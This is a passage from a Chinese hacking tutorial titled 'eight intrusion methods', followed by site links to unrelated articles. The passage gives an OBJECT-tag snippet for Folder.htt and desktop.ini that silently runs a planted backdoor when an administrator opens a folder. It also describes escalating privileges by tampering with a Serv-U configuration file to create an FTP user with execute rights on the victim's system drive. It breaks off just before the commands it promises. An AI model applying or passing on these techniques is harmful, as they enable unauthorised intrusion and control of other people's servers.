入侵八大法
另外有相同作用的是desktop.ini。大家都知道windows支持自定义文件,其实它就是通过在文件夹中写入特定文件——desktop.ini与Folder.htt来实现的,我们就可以利用修改这文件来达到我们的目的。
首先,我们现在本地建立一个文件夹,名字不重要,进入它,在空白处点右键,选择“自定义文件夹”(xp好像是不行的)一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Foldersetting的文件架与desktop.ini的文件,(如果你看不到,先取消“隐藏受保护的操作系统文件”)然后我们在Foldersetting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:
<OBJECTID=”RUNIT”WIDTH=0HEIGHT=0TYPE=”application/x-oleobject”CODEBASE=”你的后门文件名”>
</OBJECT>
然后你将你的后门文件放在Foldersetting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的后门!(如果你不放心,可以多设置几个目录)
7、Serv-U提升权限
利用Serv-U提升权限共有三种方法,溢出是第一种,我之前已经说过,这里就不介绍了。我要讲的是其余两种办法。
办法一:要求:对Serv-u安装目录有完全控制权。
方法:进入对方的Serv-U目录,察看他的ServUDaemon.ini,这是Serv-U的配置文件,如果管理员没有选择将serv-u的所有配置写入注册表的话,我们就可以从这个文件中看到Serv-U的所有信息,版本、IP、甚至用户名与密码!早些版本的密码是不加密的,但是后来是经过了MD5加密。所以不能直接得到其密码。不过我们仍然有办法:先在本地安装一个Serv-U(版本最好新点),将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini覆盖掉,重起一下Serv-U,于是你上面的所有配置都与他的一模一样了。我们新建一个用户,什么组不重要,重要的是将他的主目录改为对方的系统盘,然后加上执行权限!这个最重要。更改完后应用,退出。再将你更改过的ServUDaemon.ini文件上传,覆盖掉他的文件,然后就等他的Serv-U重启更新配置,之后我们就可以登入他的FTP。进入后执行以下命令:
- 上一篇:清除DLL后门
- 下一篇:初学Web标准的几个误区
- 网络电视盒子卡顿的处理对策
网络电视盒的除了运营商的IPTV之外,都是使用的免费的直播软件,稳定性肯定大打折扣了...
- 微信昵称怎么起 微信名字好听又个性的
「1」可以根据古典诗词取微信名 诗词的风采实在让人心醉。婉约令人沉醉,风流使人缠...
- 如何关闭不常用的计算机端口 保证电脑安全
手动关闭window不常用的端口 具体操作如下: 默认情况下,Windows有很多端口是开放的...
- 不伤液晶显示屏的清洁方法
不伤液晶显示屏的清洁方法 一般来说,酒精是一种常用的有机溶剂,可以溶解一些不容易...
- 京东商品页面选项自动跳转京东热卖
今天打开京东,发现京东商品页面选择商品型号,竟然会自动跳转到京东热卖。 不是每次...
- 把电脑TXT文档发送给微信好友的步骤
把电脑TXT文档发送给微信好友的步骤 在微信里我们可以发送文件资料了,包括图片,软...